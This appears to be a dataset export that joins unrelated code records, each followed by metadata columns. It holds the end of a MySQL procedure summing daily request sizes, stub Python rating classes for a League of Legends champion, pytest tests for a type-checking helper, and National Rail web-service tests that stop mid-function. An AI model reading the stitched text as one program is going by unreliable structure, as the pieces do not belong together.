else SET entry15 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 15 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 14 DAY) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry16 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 15 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 14 DAY) AND Websiteid = id limit 1);
else SET entry16 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 14 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 13 DAY) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry17 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 14 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 13 DAY) AND Websiteid = id limit 1);
else SET entry17 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 13 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 12 DAY) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry18 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 13 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 12 DAY) AND Websiteid = id limit 1);
else SET entry18 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 12 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 11 DAY) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry19 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 12 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 11 DAY) AND Websiteid = id limit 1);
else SET entry19 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 11 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 10 DAY) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry20 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 11 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 10 DAY) AND Websiteid = id limit 1);
else SET entry20 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 10 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 9 DAY) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry21 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 10 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 9 DAY) AND Websiteid = id limit 1);
else SET entry21 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 9 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 8 DAY) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry22 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 9 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 8 DAY) AND Websiteid = id limit 1);
else SET entry22 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 8 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 7 DAY) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry23 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 8 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 7 DAY) AND Websiteid = id limit 1);
else SET entry23 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 7 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 6 DAY) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry24 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 7 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 6 DAY) AND Websiteid = id limit 1);
else SET entry24 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 6 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 5 DAY) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry25 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 6 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 5 DAY) AND Websiteid = id limit 1);
else SET entry25 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 5 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 4 DAY) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry26 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 5 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 4 DAY) AND Websiteid = id limit 1);
else SET entry26 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 4 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 3 DAY) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry27 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 4 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 3 DAY) AND Websiteid = id limit 1);
else SET entry27 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 3 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 2 DAY) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry28 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 3 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 2 DAY) AND Websiteid = id limit 1);
else SET entry28 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 2 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 1 DAY) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry29 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 2 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 1 DAY) AND Websiteid = id limit 1);
else SET entry29 := 0;
end if;
if EXISTS(SELECT SUM(bodySize) from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 1 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 0 DAY) AND Websiteid = id limit 1))
then SELECT SUM(bodySize) INTO entry30 from REQUESTS where Metricid = (SELECT Metricid FROM WEBSITES_METRICS WHERE TIMESTAMP >= DATE_SUB(NOW(), INTERVAL 1 DAY) AND TIMESTAMP <= DATE_SUB(NOW(), INTERVAL 0 DAY) AND Websiteid = id limit 1);
else SET entry30 := 0;
end if;
END//
delimiter ;
"""
| 103.586667
| 251
| 0.725276
| 6,760
| 46,614
| 4.920414
| 0.019675
| 0.129758
| 0.159702
| 0.189646
| 0.996753
| 0.99513
| 0.99059
| 0.989598
| 0.988966
| 0.988966
| 0
| 0.033945
| 0.187905
| 46,614
| 449
| 252
| 103.817372
| 0.844723
| 0
| 0
| 0.587054
| 1
| 0.370536
| 0.995924
| 0.004183
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
419c69d678cc9cd2f88a6701ee1de53ff5cf1815
| 6,683
|
py
|
Python
|
loldib/getratings/models/NA/na_hecarim/na_hecarim_jng.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_hecarim/na_hecarim_jng.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_hecarim/na_hecarim_jng.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
from getratings.models.ratings import Ratings
class NA_Hecarim_Jng_Aatrox(Ratings):
pass
class NA_Hecarim_Jng_Ahri(Ratings):
pass
class NA_Hecarim_Jng_Akali(Ratings):
pass
class NA_Hecarim_Jng_Alistar(Ratings):
pass
class NA_Hecarim_Jng_Amumu(Ratings):
pass
class NA_Hecarim_Jng_Anivia(Ratings):
pass
class NA_Hecarim_Jng_Annie(Ratings):
pass
class NA_Hecarim_Jng_Ashe(Ratings):
pass
class NA_Hecarim_Jng_AurelionSol(Ratings):
pass
class NA_Hecarim_Jng_Azir(Ratings):
pass
class NA_Hecarim_Jng_Bard(Ratings):
pass
class NA_Hecarim_Jng_Blitzcrank(Ratings):
pass
class NA_Hecarim_Jng_Brand(Ratings):
pass
class NA_Hecarim_Jng_Braum(Ratings):
pass
class NA_Hecarim_Jng_Caitlyn(Ratings):
pass
class NA_Hecarim_Jng_Camille(Ratings):
pass
class NA_Hecarim_Jng_Cassiopeia(Ratings):
pass
class NA_Hecarim_Jng_Chogath(Ratings):
pass
class NA_Hecarim_Jng_Corki(Ratings):
pass
class NA_Hecarim_Jng_Darius(Ratings):
pass
class NA_Hecarim_Jng_Diana(Ratings):
pass
class NA_Hecarim_Jng_Draven(Ratings):
pass
class NA_Hecarim_Jng_DrMundo(Ratings):
pass
class NA_Hecarim_Jng_Ekko(Ratings):
pass
class NA_Hecarim_Jng_Elise(Ratings):
pass
class NA_Hecarim_Jng_Evelynn(Ratings):
pass
class NA_Hecarim_Jng_Ezreal(Ratings):
pass
class NA_Hecarim_Jng_Fiddlesticks(Ratings):
pass
class NA_Hecarim_Jng_Fiora(Ratings):
pass
class NA_Hecarim_Jng_Fizz(Ratings):
pass
class NA_Hecarim_Jng_Galio(Ratings):
pass
class NA_Hecarim_Jng_Gangplank(Ratings):
pass
class NA_Hecarim_Jng_Garen(Ratings):
pass
class NA_Hecarim_Jng_Gnar(Ratings):
pass
class NA_Hecarim_Jng_Gragas(Ratings):
pass
class NA_Hecarim_Jng_Graves(Ratings):
pass
class NA_Hecarim_Jng_Hecarim(Ratings):
pass
class NA_Hecarim_Jng_Heimerdinger(Ratings):
pass
class NA_Hecarim_Jng_Illaoi(Ratings):
pass
class NA_Hecarim_Jng_Irelia(Ratings):
pass
class NA_Hecarim_Jng_Ivern(Ratings):
pass
class NA_Hecarim_Jng_Janna(Ratings):
pass
class NA_Hecarim_Jng_JarvanIV(Ratings):
pass
class NA_Hecarim_Jng_Jax(Ratings):
pass
class NA_Hecarim_Jng_Jayce(Ratings):
pass
class NA_Hecarim_Jng_Jhin(Ratings):
pass
class NA_Hecarim_Jng_Jinx(Ratings):
pass
class NA_Hecarim_Jng_Kalista(Ratings):
pass
class NA_Hecarim_Jng_Karma(Ratings):
pass
class NA_Hecarim_Jng_Karthus(Ratings):
pass
class NA_Hecarim_Jng_Kassadin(Ratings):
pass
class NA_Hecarim_Jng_Katarina(Ratings):
pass
class NA_Hecarim_Jng_Kayle(Ratings):
pass
class NA_Hecarim_Jng_Kayn(Ratings):
pass
class NA_Hecarim_Jng_Kennen(Ratings):
pass
class NA_Hecarim_Jng_Khazix(Ratings):
pass
class NA_Hecarim_Jng_Kindred(Ratings):
pass
class NA_Hecarim_Jng_Kled(Ratings):
pass
class NA_Hecarim_Jng_KogMaw(Ratings):
pass
class NA_Hecarim_Jng_Leblanc(Ratings):
pass
class NA_Hecarim_Jng_LeeSin(Ratings):
pass
class NA_Hecarim_Jng_Leona(Ratings):
pass
class NA_Hecarim_Jng_Lissandra(Ratings):
pass
class NA_Hecarim_Jng_Lucian(Ratings):
pass
class NA_Hecarim_Jng_Lulu(Ratings):
pass
class NA_Hecarim_Jng_Lux(Ratings):
pass
class NA_Hecarim_Jng_Malphite(Ratings):
pass
class NA_Hecarim_Jng_Malzahar(Ratings):
pass
class NA_Hecarim_Jng_Maokai(Ratings):
pass
class NA_Hecarim_Jng_MasterYi(Ratings):
pass
class NA_Hecarim_Jng_MissFortune(Ratings):
pass
class NA_Hecarim_Jng_MonkeyKing(Ratings):
pass
class NA_Hecarim_Jng_Mordekaiser(Ratings):
pass
class NA_Hecarim_Jng_Morgana(Ratings):
pass
class NA_Hecarim_Jng_Nami(Ratings):
pass
class NA_Hecarim_Jng_Nasus(Ratings):
pass
class NA_Hecarim_Jng_Nautilus(Ratings):
pass
class NA_Hecarim_Jng_Nidalee(Ratings):
pass
class NA_Hecarim_Jng_Nocturne(Ratings):
pass
class NA_Hecarim_Jng_Nunu(Ratings):
pass
class NA_Hecarim_Jng_Olaf(Ratings):
pass
class NA_Hecarim_Jng_Orianna(Ratings):
pass
class NA_Hecarim_Jng_Ornn(Ratings):
pass
class NA_Hecarim_Jng_Pantheon(Ratings):
pass
class NA_Hecarim_Jng_Poppy(Ratings):
pass
class NA_Hecarim_Jng_Quinn(Ratings):
pass
class NA_Hecarim_Jng_Rakan(Ratings):
pass
class NA_Hecarim_Jng_Rammus(Ratings):
pass
class NA_Hecarim_Jng_RekSai(Ratings):
pass
class NA_Hecarim_Jng_Renekton(Ratings):
pass
class NA_Hecarim_Jng_Rengar(Ratings):
pass
class NA_Hecarim_Jng_Riven(Ratings):
pass
class NA_Hecarim_Jng_Rumble(Ratings):
pass
class NA_Hecarim_Jng_Ryze(Ratings):
pass
class NA_Hecarim_Jng_Sejuani(Ratings):
pass
class NA_Hecarim_Jng_Shaco(Ratings):
pass
class NA_Hecarim_Jng_Shen(Ratings):
pass
class NA_Hecarim_Jng_Shyvana(Ratings):
pass
class NA_Hecarim_Jng_Singed(Ratings):
pass
class NA_Hecarim_Jng_Sion(Ratings):
pass
class NA_Hecarim_Jng_Sivir(Ratings):
pass
class NA_Hecarim_Jng_Skarner(Ratings):
pass
class NA_Hecarim_Jng_Sona(Ratings):
pass
class NA_Hecarim_Jng_Soraka(Ratings):
pass
class NA_Hecarim_Jng_Swain(Ratings):
pass
class NA_Hecarim_Jng_Syndra(Ratings):
pass
class NA_Hecarim_Jng_TahmKench(Ratings):
pass
class NA_Hecarim_Jng_Taliyah(Ratings):
pass
class NA_Hecarim_Jng_Talon(Ratings):
pass
class NA_Hecarim_Jng_Taric(Ratings):
pass
class NA_Hecarim_Jng_Teemo(Ratings):
pass
class NA_Hecarim_Jng_Thresh(Ratings):
pass
class NA_Hecarim_Jng_Tristana(Ratings):
pass
class NA_Hecarim_Jng_Trundle(Ratings):
pass
class NA_Hecarim_Jng_Tryndamere(Ratings):
pass
class NA_Hecarim_Jng_TwistedFate(Ratings):
pass
class NA_Hecarim_Jng_Twitch(Ratings):
pass
class NA_Hecarim_Jng_Udyr(Ratings):
pass
class NA_Hecarim_Jng_Urgot(Ratings):
pass
class NA_Hecarim_Jng_Varus(Ratings):
pass
class NA_Hecarim_Jng_Vayne(Ratings):
pass
class NA_Hecarim_Jng_Veigar(Ratings):
pass
class NA_Hecarim_Jng_Velkoz(Ratings):
pass
class NA_Hecarim_Jng_Vi(Ratings):
pass
class NA_Hecarim_Jng_Viktor(Ratings):
pass
class NA_Hecarim_Jng_Vladimir(Ratings):
pass
class NA_Hecarim_Jng_Volibear(Ratings):
pass
class NA_Hecarim_Jng_Warwick(Ratings):
pass
class NA_Hecarim_Jng_Xayah(Ratings):
pass
class NA_Hecarim_Jng_Xerath(Ratings):
pass
class NA_Hecarim_Jng_XinZhao(Ratings):
pass
class NA_Hecarim_Jng_Yasuo(Ratings):
pass
class NA_Hecarim_Jng_Yorick(Ratings):
pass
class NA_Hecarim_Jng_Zac(Ratings):
pass
class NA_Hecarim_Jng_Zed(Ratings):
pass
class NA_Hecarim_Jng_Ziggs(Ratings):
pass
class NA_Hecarim_Jng_Zilean(Ratings):
pass
class NA_Hecarim_Jng_Zyra(Ratings):
pass
| 16.026379
| 46
| 0.77151
| 972
| 6,683
| 4.878601
| 0.151235
| 0.203712
| 0.407423
| 0.494728
| 0.808941
| 0.808941
| 0
| 0
| 0
| 0
| 0
| 0
| 0.166243
| 6,683
| 416
| 47
| 16.064904
| 0.851041
| 0
| 0
| 0.498195
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.498195
| 0.00361
| 0
| 0.501805
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
|
0
| 8
|
41c43c5d04dbd397cba7e1a133160b6364bf4e79
| 3,658
|
py
|
Python
|
tests/test_unit/test_type_utils.py
|
best-doctor/Mario
|
a6c83b9f7e7558a4e71d8acb00b8d164fe8eec6f
|
[
"MIT"
] | 12
|
2020-01-30T02:19:16.000Z
|
2022-01-20T04:00:43.000Z
|
tests/test_unit/test_type_utils.py
|
best-doctor/Mario
|
a6c83b9f7e7558a4e71d8acb00b8d164fe8eec6f
|
[
"MIT"
] | 32
|
2019-12-07T14:06:05.000Z
|
2020-06-26T07:12:03.000Z
|
tests/test_unit/test_type_utils.py
|
best-doctor/Mario
|
a6c83b9f7e7558a4e71d8acb00b8d164fe8eec6f
|
[
"MIT"
] | 3
|
2020-08-21T07:54:53.000Z
|
2021-01-11T12:05:48.000Z
|
import collections
from typing import List, Dict, Mapping, Iterable, Tuple, Set, Optional, Union
import pytest
from super_mario.utils.types import is_instance_of_type, is_instance_of_named_tuple
def test_is_instance_of_type_simple_types():
assert is_instance_of_type(1, int)
assert is_instance_of_type('abc', str)
assert is_instance_of_type([1, 2], list)
assert is_instance_of_type({1: 2}, dict)
assert not is_instance_of_type(1, str)
assert not is_instance_of_type('abc', int)
assert not is_instance_of_type([1, 2], dict)
assert not is_instance_of_type({1: 2}, list)
def test_is_instance_of_type_basic_typing_types():
assert is_instance_of_type([], List)
assert is_instance_of_type({}, Dict)
assert is_instance_of_type({}, Mapping)
assert is_instance_of_type([], Iterable)
assert not is_instance_of_type([], Dict)
assert not is_instance_of_type({}, List)
assert not is_instance_of_type({}, Tuple)
assert not is_instance_of_type([], Set)
def test_is_instance_of_type_typing_list_with_simple_types():
assert is_instance_of_type([1, 2, 3], List[int])
assert not is_instance_of_type([1, 2, 3], List[str])
assert not is_instance_of_type([1, 2, '3'], List[str])
assert not is_instance_of_type({1: 2}, List[str])
def test_is_instance_of_type_typing_dict_with_simple_types():
assert is_instance_of_type({1: '1', 2: '2'}, Dict[int, str])
assert is_instance_of_type({1: '1', 2: '2'}, Mapping[int, str])
assert not is_instance_of_type({1: '1', 2: '2'}, Dict[str, str])
assert not is_instance_of_type({1: '1', 2: '2'}, Dict[int, int])
assert not is_instance_of_type([1, 2, 3, 4], Dict[int, int])
def test_is_instance_of_type_typing_with_optionals():
assert is_instance_of_type(1, Optional[int])
assert is_instance_of_type(None, Optional[int])
assert is_instance_of_type(None, Optional[List[int]])
assert is_instance_of_type([], List[Optional[int]])
assert is_instance_of_type([1, 2], List[Optional[int]])
assert is_instance_of_type([1, 2, None], List[Optional[int]])
assert not is_instance_of_type([1, 2, 'None'], List[Optional[int]])
assert is_instance_of_type(None, Optional[Dict])
assert is_instance_of_type(None, Optional[Dict[str, Optional[int]]])
assert is_instance_of_type({'a': 1, 'b': None}, Dict[str, Optional[int]])
assert is_instance_of_type({1: 'a', None: 'b'}, Dict[Optional[int], str])
def test_is_instance_of_type_typing_with_unions():
assert is_instance_of_type(1, Union[int])
assert is_instance_of_type(1, Union[int, str])
assert is_instance_of_type('1', Union[int, str])
assert is_instance_of_type([], Union[List, Dict])
assert is_instance_of_type({}, Union[List, Dict])
assert not is_instance_of_type(set(), Union[List, Dict])
assert not is_instance_of_type([], Union[int, str])
assert is_instance_of_type([], List[Union[int]])
assert is_instance_of_type([1, 2], List[Union[int, str]])
assert is_instance_of_type([1, '2'], List[Union[int, str]])
assert not is_instance_of_type([1, '2', None], List[Union[int, str]])
assert is_instance_of_type({'a': 1, 'b': '2'}, Dict[str, Union[int, str]])
assert is_instance_of_type({1: 'a', '2': 'b'}, Dict[Union[int, str], str])
@pytest.mark.parametrize(
('named_tuple', 'expected_result'),
[
(collections.namedtuple('Test', 'a, b, c')(1, 2, 3), True),
((1, 2, 3), False),
('str', False),
(['str'], False),
],
)
def test_is_instance_of_named_tuple(named_tuple, expected_result):
assert is_instance_of_named_tuple(named_tuple) == expected_result
| 38.914894
| 83
| 0.702843
| 597
| 3,658
| 3.946399
| 0.082077
| 0.250424
| 0.300509
| 0.380306
| 0.840407
| 0.816214
| 0.707555
| 0.654499
| 0.544992
| 0.289049
| 0
| 0.022272
| 0.153089
| 3,658
| 93
| 84
| 39.333333
| 0.738218
| 0
| 0
| 0
| 0
| 0
| 0.020503
| 0
| 0
| 0
| 0
| 0
| 0.714286
| 1
| 0.1
| false
| 0
| 0.057143
| 0
| 0.157143
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
68beee8640eed8e164e7e6630c62b422e7ddb650
| 17,547
|
py
|
Python
|
tests/test_ldbws_session.py
|
grundleborg/nrewebservices
|
f8416afad160366c70b0579c37aa11fb175ccac1
|
[
"BSD-2-Clause"
] | 15
|
2017-03-16T14:34:56.000Z
|
2021-09-18T23:27:03.000Z
|
tests/test_ldbws_session.py
|
grundleborg/nrewebservices
|
f8416afad160366c70b0579c37aa11fb175ccac1
|
[
"BSD-2-Clause"
] | 9
|
2016-09-09T13:43:32.000Z
|
2018-12-30T19:55:09.000Z
|
tests/test_ldbws_session.py
|
grundleborg/nrewebservices
|
f8416afad160366c70b0579c37aa11fb175ccac1
|
[
"BSD-2-Clause"
] | 3
|
2016-12-12T12:29:56.000Z
|
2018-06-03T22:44:51.000Z
|
import os
import sys
testsPath = os.path.dirname(os.path.abspath(__file__))
sys.path.insert(0, testsPath + '/../')
from suds import WebFault
import os
import pytest
from nrewebservices.ldbws import Session
API_URL = "https://lite.realtime.nationalrail.co.uk/OpenLDBWS/wsdl.aspx?ver=2016-02-16"
@pytest.fixture(scope="module")
def session():
return Session(API_URL)
@pytest.mark.skipif(os.environ.get("NRE_LDBWS_API_KEY") is None,
reason="NRE_LDBWS_API_KEY must be set to test ldbws.Session class.")
class TestSession(object):
def test_get_station_board_arrivals(self, session):
r = session.get_station_board("PAD", rows=10, include_departures=False, include_arrivals=True)
assert r.location_name == "London Paddington"
assert r.crs == "PAD"
assert r.filter_location_name is None
assert r.filter_crs is None
assert r.filter_type is None
def test_get_station_board_departures(self, session):
r = session.get_station_board("PAD", rows=10, include_departures=True, include_arrivals=False)
assert r.location_name == "London Paddington"
assert r.crs == "PAD"
assert r.filter_location_name is None
assert r.filter_crs is None
assert r.filter_type is None
def test_get_station_board_arrivals_departures(self, session):
r = session.get_station_board("PAD", rows=10, include_departures=True, include_arrivals=True)
assert r.location_name == "London Paddington"
assert r.crs == "PAD"
assert r.filter_location_name is None
assert r.filter_crs is None
assert r.filter_type is None
def test_get_station_board_neither(self, session):
with pytest.raises(ValueError):
r = session.get_station_board("PAD", rows=10, include_departures=False, include_arrivals=False)
def test_get_station_board_arrivals_filtered_from(self, session):
r = session.get_station_board("PAD", rows=10, include_departures=False,
include_arrivals=True, from_filter_crs="RDG")
assert r.location_name == "London Paddington"
assert r.crs == "PAD"
assert r.filter_location_name == "Reading"
assert r.filter_crs == "RDG"
assert r.filter_type == "from"
def test_get_station_board_departures_filtered_from(self, session):
r = session.get_station_board("PAD", rows=10, include_departures=True,
include_arrivals=False, from_filter_crs="RDG")
assert r.location_name == "London Paddington"
assert r.crs == "PAD"
assert r.filter_location_name == "Reading"
assert r.filter_crs == "RDG"
assert r.filter_type == "from"
def test_get_station_board_arrivals_departures_filtered_from(self, session):
r = session.get_station_board("PAD", rows=10, include_departures=True,
include_arrivals=True, from_filter_crs="RDG")
assert r.location_name == "London Paddington"
assert r.crs == "PAD"
assert r.filter_location_name == "Reading"
assert r.filter_crs == "RDG"
assert r.filter_type == "from"
@pytest.mark.xfail
def test_get_station_board_arrivals_filtered_to(self, session):
r = session.get_station_board("PAD", rows=10, include_departures=False,
include_arrivals=True, to_filter_crs="RDG")
assert r.location_name == "London Paddington"
assert r.crs == "PAD"
assert r.filter_location_name == "Reading"
assert r.filter_crs == "RDG"
# TODO: Investigate why filter_type is None, not "to".
assert r.filter_type == "to"
@pytest.mark.xfail
def test_get_station_board_departures_filtered_to(self, session):
r = session.get_station_board("PAD", rows=10, include_departures=True,
include_arrivals=False, to_filter_crs="RDG")
assert r.location_name == "London Paddington"
assert r.crs == "PAD"
assert r.filter_location_name == "Reading"
assert r.filter_crs == "RDG"
# TODO: Investigate why filter_type is None, not "to".
assert r.filter_type == "to"
@pytest.mark.xfail
def test_get_station_board_arrivals_departures_filtered_to(self, session):
r = session.get_station_board("PAD", rows=10, include_departures=True,
include_arrivals=True, to_filter_crs="RDG")
assert r.location_name == "London Paddington"
assert r.crs == "PAD"
assert r.filter_location_name == "Reading"
assert r.filter_crs == "RDG"
# TODO: Investigate why filter_type is None, not "to".
assert r.filter_type == "to"
@pytest.mark.xfail
def test_get_station_board_arrivals_filtered_both_filters(self, session):
r = session.get_station_board("PAD", rows=10, include_departures=False,
include_arrivals=True, from_filter_crs="RDG", to_filter_crs="RDG")
assert r.location_name == "London Paddington"
assert r.crs == "PAD"
assert r.filter_location_name == "Reading"
assert r.filter_crs == "RDG"
# TODO: Investigate why filter_type is None, not "to".
assert r.filter_type == "to"
### NEXT ###
def test_get_station_board_with_details_arrivals(self, session):
r = session.get_station_board_with_details("PAD", rows=10, include_departures=False, include_arrivals=True)
assert r.location_name == "London Paddington"
assert r.crs == "PAD"
assert r.filter_location_name is None
assert r.filter_crs is None
assert r.filter_type is None
def test_get_station_board_with_details_departures(self, session):
r = session.get_station_board_with_details("PAD", rows=10, include_departures=True, include_arrivals=False)
assert r.location_name == "London Paddington"
assert r.crs == "PAD"
assert r.filter_location_name is None
assert r.filter_crs is None
assert r.filter_type is None
def test_get_station_board_with_details_arrivals_departures(self, session):
r = session.get_station_board_with_details("PAD", rows=10, include_departures=True, include_arrivals=True)
assert r.location_name == "London Paddington"
assert r.crs == "PAD"
assert r.filter_location_name is None
assert r.filter_crs is None
assert r.filter_type is None
def test_get_station_board_with_details_neither(self, session):
with pytest.raises(ValueError):
r = session.get_station_board_with_details("PAD", rows=10, include_departures=False, include_arrivals=False)
def test_get_station_board_arrivals_with_details_filtered_from(self, session):
r = session.get_station_board_with_details("PAD", rows=10, include_departures=False,
include_arrivals=True, from_filter_crs="RDG")
